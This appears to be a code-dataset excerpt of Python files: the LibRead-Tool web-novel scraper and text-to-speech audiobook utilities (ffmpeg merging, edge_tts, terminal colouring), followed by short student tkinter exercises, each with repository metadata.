'referer': config.get("DOMAIN", "referer")}
global DOMAIN_NAME
DOMAIN_NAME = config.get("DOMAIN", "domainName")
except:
printWar("Corrupted config file detected! Re-generating a new one...")
create_default_config(CONFIG_FILE)
_readConfig()
else:
create_default_config(CONFIG_FILE)
_readConfig()
def checkConnection():
_readConfig()
url = f"https://{DOMAIN_NAME}/"
try:
con = requests.get(url, timeout=10, verify=False)
if(con.status_code == 200):
return True
else:
print("Connection established with Status code " + con.status_code)
return False
except:
return False
def search(query: str):
_readConfig()
payload = {"searchkey": query}
res = requests.post(f"https://{DOMAIN_NAME}/search", data=payload, headers=HEADERS, verify=False)
soup = BeautifulSoup(res.content, 'html.parser')
#For Debugging purposes
with open("searchResultDump.html", 'w', encoding='utf-8') as f:
f.write(res.content.decode())
results = soup.select(SEARCH_PAGE_SELECTOR)
return results
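# Illustrative usage (assuming the site is reachable): search("martial peak") returns the matching
# <a> elements from the results page; each element's .text is typically the novel title and its
# "href" attribute the link used by the rest of the tool.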
def getMetadata(url: str):
_readConfig()
try:
res = requests.get(url, headers=HEADERS, verify=False)
except:
try:
res = requests.get(url, headers=HEADERS)
except Exception as E:
printErr(f"Error occured while fetching {url}. | Error: {E} |")
soup = BeautifulSoup(res.content, 'html.parser')
#For Debugging purposes
with open("novelPageDump.html", 'w', encoding='utf-8') as f:
f.write(res.content.decode())
metadata = {'chapters': [], 'status' : None, 'cover-image': None}
chapters = soup.select(CHAPTER_SELECTOR)
metadata.update({'chapters' : chapters})
status = "Unknow"
try:
status = soup.select(STATUS_SELECTOR_I)[0].text
except:
try:
status = soup.select(STATUS_SELECTOR_II)[0].text
except:
try:
status = soup.select(STATUS_SELECTOR_III)[0].text
except:
pass
metadata.update({'status' : status})
try:
imageUrl = f"https://{DOMAIN_NAME}/" + soup.select(IMAGE_URL_SELECTOR)[0]["src"]
image = requests.get(imageUrl, headers=HEADERS, stream=True)
metadata.update({'cover-image':image})
except:
pass
return metadata
def getArticle(url: str):
_readConfig()
try:
res = requests.get(url, headers=HEADERS, verify=False)
except:
try:
res = requests.get(url, headers=HEADERS)
except Exception as E:
printErr(f"Error occured while fetching {url}. | Error: {E} |")
soup = BeautifulSoup(res.content, 'html.parser')
#For Debugging purposes
with open('articlePageDump.html', 'w', encoding='utf-8') as f:
f.write(res.content.decode())
articleDiv = soup.select(ARTICLE_DIV_SELECTOR)
articleDiv = articleDiv[0:len(articleDiv)-1]
articleStr = ""
for article in articleDiv:
if(article.text == "…" or article.text == "..."):
continue
#filter out words that can break tts
articleStr += article.text.replace("�������.���", "").replace("…", "").replace("...", "").replace("�������.���", "").replace("“", "").replace("�", "").replace("�������.���", "").replace("*", "")
articleStr += "\n"
return articleStr | 5,472 | Python | .py | 125 | 35.608 | 298 | 0.63781 | Spectre-hidN/LibRead-Tool | 8 | 0 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,193 | ffmpegWrapper.py | Spectre-hidN_LibRead-Tool/src/utils/ffmpegWrapper.py | import subprocess
import re
import os
import configparser
from .configGenerator import create_default_config
from .Prettify import Prettify, clearLine
from .twoSecondSilence import getFileBytes
import music_tag
printSuc = Prettify.printSuc
printWar = Prettify.printWar
printErr = Prettify.printErr
printFeaturedText = Prettify.printFeaturedText
CONFIG_FILE = "libread-config.ini"
global EMBED_SUBS
def _sorted_alphanumeric(data):
convert = lambda text: int(text) if text.isdigit() else text.lower()
alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]
return sorted(data, key=alphanum_key)
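# Illustrative example (hypothetical file names): _sorted_alphanumeric(["10.mp3", "2.mp3", "1.mp3"])
# returns ["1.mp3", "2.mp3", "10.mp3"], whereas a plain sorted() would place "10.mp3" before "2.mp3".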
def _readConfig():
if(os.path.isfile(CONFIG_FILE)):
try:
config = configparser.ConfigParser()
config.read(CONFIG_FILE)
global EMBED_SUBS
EMBED_SUBS = config.getboolean("TTS_CONFIG", "embedSubtitles")
except:
printWar("Corrupted config file detected! Re-generating a new one...")
create_default_config(CONFIG_FILE)
_readConfig()
else:
create_default_config(CONFIG_FILE)
_readConfig()
def performSanityCheck() -> bool:
try:
result = subprocess.check_output(["ffmpeg", "-version"]).decode()
except:
printFeaturedText(msg="FFMPEG not found in the path! LibRead-Tool will download all articles before converting them.")
return False
ffmpegVersion = re.search("ffmpeg version (.*) Copyright", result).group(1)
printSuc(f"FFMPEG version {ffmpegVersion} found!")
return True
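# Illustrative performSanityCheck() behaviour: a banner such as
# "ffmpeg version 6.0 Copyright (c) 2000-2023 the FFmpeg developers" is reported as "FFMPEG version 6.0 found!".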
# Will merge all mp3 files into one and embed the subtitles from subs.txt
def mergeChunks(chunkFilesDir: str, outputFilePrefix: str, coverImagePath = None) -> None:
_readConfig()
allMP3Files = _sorted_alphanumeric([f for f in os.listdir(chunkFilesDir) if (os.path.isfile(os.path.join(chunkFilesDir, f)) and (f.split(".")[-1] == "mp3"))])
with open(f'{chunkFilesDir}/2s-delay.mp3', 'wb') as df:
df.write(getFileBytes())
ffmpegfileList = "".join(f"file '{f}'\nfile '2s-delay.mp3'\n" for f in allMP3Files)
    with open(f'{chunkFilesDir}/inputFiles.txt', 'w', encoding="utf-8") as cf:
cf.write(ffmpegfileList)
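    # Illustrative inputFiles.txt contents for two hypothetical chunks "0.mp3" and "1.mp3":
    #   file '0.mp3'
    #   file '2s-delay.mp3'
    #   file '1.mp3'
    #   file '2s-delay.mp3'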
retCode = os.system(f'ffmpeg -f concat -safe 0 -i "{chunkFilesDir}/inputFiles.txt" -c copy -map_metadata 0 "{outputFilePrefix}.mp3" -loglevel panic')
if(retCode != 0):
clearLine()
printErr(f"Merge Error occured! FFMPEG ReturnCode: {str(retCode)}")
return
# Add ID3 tags
f = music_tag.load_file(f'{outputFilePrefix}.mp3')
if(EMBED_SUBS):
with open(f"{chunkFilesDir}/subs.txt", 'r', encoding="utf-8") as sf:
f["lyrics"] = sf.read()
if(coverImagePath):
        with open(coverImagePath, 'rb') as img_in:
            f["artwork"] = img_in.read()
f.save() | 2,851 | Python | .py | 64 | 38.171875 | 162 | 0.682049 | Spectre-hidN/LibRead-Tool | 8 | 0 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,194 | Prettify.py | Spectre-hidN_LibRead-Tool/src/utils/Prettify.py | import sys
import os
import time
def clearScreen():
"""
Clears the terminal
"""
if os.name == 'nt':
os.system("cls")
else:
os.system("clear")
def clearLine():
"""
Clears the current line
"""
length = os.get_terminal_size()[0]
whiteSpace = " "*length
print(whiteSpace, end="\r")
class Prettify():
def __init__(self):
"""Return specified color escape c0des if flushCodes flag is False else flush it to the console."""
        # For some unknown reason, Windows' command prompt does not recognise any escape code unless it is registered/cached using system calls. The line below makes sure all escape codes are recognised.
if os.name == 'nt':
os.system('echo|set /p="\033[38;5;12m\033[0m"')
try:
if sys.argv[1] == 'dump_cols':
self.flushCodes = True
else:
self.flushCodes = False
except:
self.flushCodes = False
try:
if sys.argv[1] == 'dump_bgs':
self.OnlyBG = True
else:
self.OnlyBG = False
except:
self.OnlyBG = False
def dump_colors(self, code=None, ForBG=False):
for i in range(0, 256):
color_code = str(i)
if not self.OnlyBG:
escape_code = u"\u001b[38;5;" + color_code + "m"
else:
escape_code = "\033[48;5;" + color_code + "m"
if code != None:
if str(code) == color_code:
return escape_code
elif code == None:
if self.OnlyBG or self.flushCodes:
sys.stdout.write(escape_code + color_code.ljust(4) + " ")
def progressBar(self, total_size: int, size_done: int, prefix="On the way!", suffix="There", length=None, fill_symbol='█', ToBeFill_symbol=' ', static_color=[]): #type: ignore
"""
Simple Progress bar that changes colors upon progress!
PARAMETERS --> length {DEFAULT: os.get_terminal_size()[0] - len(prefix) - len(suffix)- 11}
prefix {DEFAULT: "On the way!"}
suffix {DEFAULT: "There"}
total_size {DATATYPE: int} [REQUIRED]
size_done {DATATYPE: int} [REQUIRED]
fill_symbol {DEFAULT: '█'}
ToBeFill_symbol {DEFAULT: ' '}
static_color {DEFAULT: []} (Index: [0 -> fill_symbol, 1 -> ToBeFill_symbol])
NOTE --> endline (\n) should be provided after the job is completed to bring the cursor to a new line.
                 When overriding the 'fill_symbol' or 'ToBeFill_symbol' with characters of a different length, specifying the length manually might be required.
"""
decimals = 1
if length == None:
length = os.get_terminal_size()[0] - len(prefix) - len(suffix) - 11
if len(fill_symbol) > 1:
length = length // len(fill_symbol)
total = total_size
ToBeFill_length = len(fill_symbol) // len(ToBeFill_symbol)
try:
ToBeFill_symbol = self.dump_colors(code=static_color[1]) + ToBeFill_symbol + self.dump_colors(code=7)
except (IndexError, TypeError):
pass
# Progress Bar Printing Function
def printProgressBar(iteration):
if self.flushCodes == True:
exit(0)
percent = round(float(("{0:." + str(decimals) + "f}").format(100 * (iteration / float(total)))) + 0.1, 1)
if percent > float(100):
percent = 100.0
fill_color_applied = False
try:
fill = self.dump_colors(code=static_color[0]) + fill_symbol + self.dump_colors(code=7)
fill_color_applied = True
except (IndexError, TypeError):
pass
if not fill_color_applied:
if percent >= float(0) and percent <= float(11):
fill = self.dump_colors(
code=124) + fill_symbol + self.dump_colors(code=7)
elif percent > float(11) and percent <= float(21):
fill = self.dump_colors(
code=196) + fill_symbol + self.dump_colors(code=7)
elif percent > float(21) and percent <= float(31):
fill = self.dump_colors(
code=202) + fill_symbol + self.dump_colors(code=7)
elif percent > float(31) and percent <= float(41):
fill = self.dump_colors(
code=208) + fill_symbol + self.dump_colors(code=7)
elif percent > float(41) and percent <= float(55):
fill = self.dump_colors(
code=220) + fill_symbol + self.dump_colors(code=7)
elif percent > float(55) and percent <= float(71):
fill = self.dump_colors(
code=190) + fill_symbol + self.dump_colors(code=7)
elif percent > float(71) and percent <= float(85):
fill = self.dump_colors(
code=34) + fill_symbol + self.dump_colors(code=7)
elif percent > float(85):
fill = self.dump_colors(
code=46) + fill_symbol + self.dump_colors(code=7)
filledLength = int(length * iteration // total) + 1
bar = fill * filledLength + (ToBeFill_symbol * ToBeFill_length) * (length - filledLength)
print(f'\r{prefix} |{bar}| {percent}% {suffix}', end="\r")
if self.flushCodes or self.OnlyBG:
exit(0)
else:
printProgressBar(size_done)
def dump_styles(self, styles=None):
"""
        Return the escape code of the specified style.
*** Tested on Unix terminal ***
"""
if styles == 'bold':
return "\033[1m"
elif styles == 'faint':
return '\033[2m'
elif styles == 'italic':
return '\033[3m'
elif styles == 'underline':
return '\033[4m'
elif styles == 'blink':
return '\033[5m'
elif styles == 'reverse':
return '\033[7m'
elif styles == 'conceal':
return '\033[8m'
elif styles == 'crossed-out':
return '\033[9m'
elif styles == 'double-underline':
return '\033[21m'
elif styles == 'bold-off' or styles == 'faint-off':
return '\033[22m'
elif styles == 'italic-off':
return '\033[23m'
elif styles == 'underline-off':
return '\033[24m'
elif styles == 'blink-off':
return '\033[25m'
elif styles == 'reverse-off':
return '\033[27m'
elif styles == 'reveal' or styles == 'conceal-off': #type: ignore
return '\033[28m'
elif styles == 'crossed-out-off':
return '\033[29m'
elif styles == "overlined":
return '\033[53m'
elif styles == 'overlined-off':
return '\033[55m'
elif styles == 'reset':
return '\033[0m'
@staticmethod
def printErr(msg: str, pauseOnError = True) -> None:
obj = Prettify()
print(f"{obj.dump_colors(code=196)}{msg}{obj.dump_styles(styles='reset')}")
input() if pauseOnError else None
@staticmethod
def printSuc(msg: str) -> None:
obj = Prettify()
print(f"{obj.dump_colors(code=46)}{msg}{obj.dump_styles(styles='reset')}")
@staticmethod
def printWar(msg: str) -> None:
obj = Prettify()
print(f"{obj.dump_colors(code=208)}{msg}{obj.dump_styles(styles='reset')}")
@staticmethod
def printInf(msg: str) -> None:
obj = Prettify()
print(f"{obj.dump_colors(code=198)}{msg}{obj.dump_styles(styles='reset')}")
@staticmethod
def printFeaturedText(msg: str, blinkersColorCode = 196, msgColorCode = 226):
self = Prettify()
print(self.dump_styles(styles='blink') + self.dump_colors(code=blinkersColorCode) + '♦ ' + self.dump_styles(styles='blink-off') + self.dump_colors(code=msgColorCode) + msg + self.dump_styles(styles='blink') + self.dump_colors(code=blinkersColorCode) + ' ♦' + self.dump_styles(styles='reset'))
if __name__ == "__main__":
"""For Debugging and Initial testing purposes"""
cl = Prettify()
cl.dump_colors()
dump_styles = False
try:
if sys.argv[1] == 'dump_styles':
dump_styles = True
else:
dump_styles = False
except:
pass
if dump_styles:
#show styles
print(cl.dump_styles(styles='underline') + 'Styles' + cl.dump_styles(styles='underline-off') + ' ' + cl.dump_styles(styles='underline') + 'Codename' + cl.dump_styles(styles='underline-off'))
print(cl.dump_styles(styles='bold') + "Bold Text" + cl.dump_styles(styles='bold-off') + ' ' + 'bold, bold-off')
print(cl.dump_styles(styles='faint') + "Faint Text" + cl.dump_styles(styles='faint-off') + ' ' + 'faint, faint-off')
print(cl.dump_styles(styles='italic') + "Italic Text" + cl.dump_styles(styles='italic-off') + ' ' + 'italic, italic-off')
print(cl.dump_styles(styles='underline') + "Underlined Text" + cl.dump_styles(styles='underline-off') + ' ' + 'underline, underline-off')
print(cl.dump_styles(styles='blink') + "Blinking Text" + cl.dump_styles(styles='blink-off') + ' ' + 'blink, blink-off')
print(cl.dump_styles(styles='reverse') + "Inverse FG/BG" + cl.dump_styles(styles='reverse-off') + ' ' + 'reverse, reverse-off')
print(cl.dump_styles(styles='conceal') + "Conceal Text" + cl.dump_styles(styles='reveal') + ' ' + 'conceal, reveal')
print(cl.dump_styles(styles='overlined') + "Overlined Text" + cl.dump_styles(styles='overlined-off') + ' ' + 'overlined, overlined-off')
print(cl.dump_styles(styles='crossed-out') + "Crossed Text" + cl.dump_styles(styles='crossed-out-off') + ' ' + 'crossed-out, crossed-out-off')
print(cl.dump_styles(styles='double-underline') + "Double underlined Text" + cl.dump_styles(styles='underline-off') + ' ' + 'double-underline, underline-off')
print()
print(cl.dump_styles(styles='blink') + cl.dump_colors(code=196) + '♦ ' + cl.dump_styles(styles='blink-off') + cl.dump_colors(code=226) + 'Tested on Unix Terminal. Some styles may not work on other platforms' + cl.dump_styles(styles='blink') + cl.dump_colors(code=196) + ' ♦' + cl.dump_styles(styles='reset'))
else:
for i in range(123452):
time.sleep(0.0001)
cl.progressBar(total_size=123452, size_done=i, fill_symbol=' ☻ ', ToBeFill_symbol=' ☺ ', length=20)
print()
| 10,903 | Python | .py | 217 | 38.400922 | 316 | 0.556664 | Spectre-hidN/LibRead-Tool | 8 | 0 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,195 | tts.py | Spectre-hidN_LibRead-Tool/src/utils/tts.py | import edge_tts
import os
import configparser
import re
from .Prettify import Prettify
from .configGenerator import create_default_config
import music_tag
CONFIG_FILE = "libread-config.ini"
global EMBED_SUBS
global VOICE_NAME
printWar = Prettify.printWar
def _readConfig():
if(os.path.isfile(CONFIG_FILE)):
try:
config = configparser.ConfigParser()
config.read(CONFIG_FILE)
global VOICE_NAME
VOICE_NAME = config.get("TTS_CONFIG", "Voice")
global EMBED_SUBS
EMBED_SUBS = config.getboolean("TTS_CONFIG", "embedSubtitles")
except:
printWar("Corrupted config file detected! Re-generating a new one...")
create_default_config(CONFIG_FILE)
_readConfig()
else:
create_default_config(CONFIG_FILE)
_readConfig()
async def createTTSFromFile(filepath: str, outputFilePrefix: str, coverImagePath = None):
_readConfig()
inputFile = open(filepath, 'r', encoding='utf-8')
communicate = edge_tts.Communicate(inputFile.read(), VOICE_NAME)
submaker = edge_tts.SubMaker()
with open(outputFilePrefix+".mp3", "wb") as f:
async for chunk in communicate.stream():
if chunk["type"] == "audio":
f.write(chunk["data"])
elif chunk["type"] == "WordBoundary":
submaker.create_sub((chunk["offset"], chunk["duration"]), chunk["text"])
subs = submaker.generate_subs()
with open(outputFilePrefix+".vtt", "w", encoding="utf-8") as sf:
sf.write(subs)
subs = subs.replace("""WEBVTT""", "")
subs = re.sub("[0-9]{2}:[0-9]{2}:[0-9]{2}.[0-9]{3} --> [0-9]{2}:[0-9]{2}:[0-9]{2}.[0-9]{3}", "", subs)
subs = re.sub(r'(\n\s*)+', "\n", subs)
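    # Illustrative effect of the three lines above: a VTT cue such as
    #   "00:00:01.000 --> 00:00:02.500" followed by its caption text
    # collapses to just the caption text, one line per cue.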
f = music_tag.load_file(outputFilePrefix+".mp3")
if(EMBED_SUBS):
f["lyrics"] = subs
if(coverImagePath):
with open(coverImagePath, 'rb') as img_in:
f["artwork"] = img_in.read()
f.save()
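# Illustrative use of createTTSFromFile (hypothetical paths): asyncio.run(createTTSFromFile("part1.txt", "part1"))
# would produce part1.mp3 and part1.vtt using the Voice configured in libread-config.ini.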
async def createTTSFromText(text: str, outputPath: str, coverImagePath = None, embedSubtitles = False):
_readConfig()
if(os.path.isfile(outputPath)): os.remove(outputPath)
communicate = edge_tts.Communicate(text, VOICE_NAME)
subFile = open(os.path.dirname(outputPath)+"/subs.txt", "a+", encoding="utf-8")
submaker = edge_tts.SubMaker()
with open(outputPath, "ab") as ttsFile:
async for chunk in communicate.stream():
if(chunk["type"] == "audio"):
ttsFile.write(chunk["data"])
elif(chunk["type"] == "WordBoundary"):
submaker.create_sub((chunk["offset"], chunk["duration"]), chunk["text"])
subs = submaker.generate_subs()
subs = subs.replace("""WEBVTT""", "")
subs = re.sub("[0-9]{2}:[0-9]{2}:[0-9]{2}.[0-9]{3} --> [0-9]{2}:[0-9]{2}:[0-9]{2}.[0-9]{3}", "", subs)
subs = re.sub(r'(\n\s*)+', "\n", subs)
subFile.write(f"{subs}\n")
subFile.close()
# Add ID3 tags
f = music_tag.load_file(outputPath)
if(embedSubtitles): f["lyrics"] = subs
if(coverImagePath):
with open(coverImagePath, 'rb') as img_in:
f["artwork"] = img_in.read()
f.save() | 3,214 | Python | .py | 76 | 34.723684 | 106 | 0.608401 | Spectre-hidN/LibRead-Tool | 8 | 0 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,196 | nuevo.py | Ingenieria2024_ingenieria_2024/nuevo.py | print("prueba nueva")
import tkinter as tk
from tkinter import ttk
print("prueba nueva2")
print("prueba nueva3") | 112 | Python | .py | 5 | 21.6 | 23 | 0.805556 | Ingenieria2024/ingenieria_2024 | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,197 | haciendounaventana.py | Ingenieria2024_ingenieria_2024/haciendounaventana.py | import tkinter as tk
from tkinter import ttk
def saludar():
    print("Hola a todxs")
# The 'contestar' callback used below was never defined in this file; a minimal stub is assumed here.
def contestar():
    print("Contestando")
root = tk.Tk ()
root.geometry("450x200")
root.title("practicando")
etiqueta = ttk.Label(root, text="Hoy practicamos tkinter", padding=(50, 30))
etiqueta.pack ()
boton_saludo = ttk.Button(root, text="saludo", command =saludar)
boton_saludo.pack()
boton_contestar = ttk.Button(root, text="contestar", command =contestar)
boton_contestar.pack()
boton_salir = ttk.Button(root, text="salir", command =root.destroy)
boton_salir.pack()
root.mainloop()
| 541 | Python | .py | 16 | 32.3125 | 74 | 0.760536 | Ingenieria2024/ingenieria_2024 | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,198 | presentacion.py | Ingenieria2024_ingenieria_2024/presentacion.py | # Presentación en Python
def presentacion():
nombre = "gisela"
ocupacion = "estudiante"
print(f"¡Hola! Soy {nombre}, {ocupacion}.")
if __name__ == "__main__":
presentacion()
| 205 | Python | .py | 7 | 23.857143 | 47 | 0.630435 | Ingenieria2024/ingenieria_2024 | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,199 | tkinter_GuzmanIvan.py | Ingenieria2024_ingenieria_2024/tkinter_GuzmanIvan.py | import tkinter as tk
from tkinter import ttk
# Window
root = tk.Tk()
root.geometry ("500x300")
root.title ("¡Bienvenidos al portal de la UNPAZ!")
root.config (background="light blue")
# 1st frame
frame1 = tk.Frame()
etiqueta_nombre = ttk.Label (frame1, text = "Ingresar su nombre y apellido", padding = (5, 5), font = "arial", background = "light green")
etiqueta_nombre.pack (side = "left", ipadx = 1, ipady = 1)
entrada_nombre = tk.Entry (frame1, bg = "white")
entrada_nombre.pack (side = "left")
frame1.pack()
# 2nd frame
frame2 = tk.Frame()
etiqueta_dni = ttk.Label (frame2, text = "Ingresar su DNI", padding = (5, 5), font = "arial", background = "light green")
etiqueta_dni.pack (side = "left")
entrada_dni = tk.Entry (frame2, bg = "white")
entrada_dni.pack (side = "left")
frame2.pack()
# 3rd frame
frame3 = tk.Frame()
etiqueta_contraseña = ttk.Label (frame3, text = "Ingresar contraseña", padding = (5, 5), font = "arial", background = "light green")
etiqueta_contraseña.pack()
entrada_contraseña = tk.Entry (frame3, bg = "white")
entrada_contraseña.pack()
frame3.pack()
# Buttons
boton_cancelar = ttk.Button (root, text = "Cancelar", padding = (5, 5), command = root.destroy)
boton_cancelar.pack()
# Loop
root.mainloop() | 1,249 | Python | .py | 33 | 36.212121 | 138 | 0.708787 | Ingenieria2024/ingenieria_2024 | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |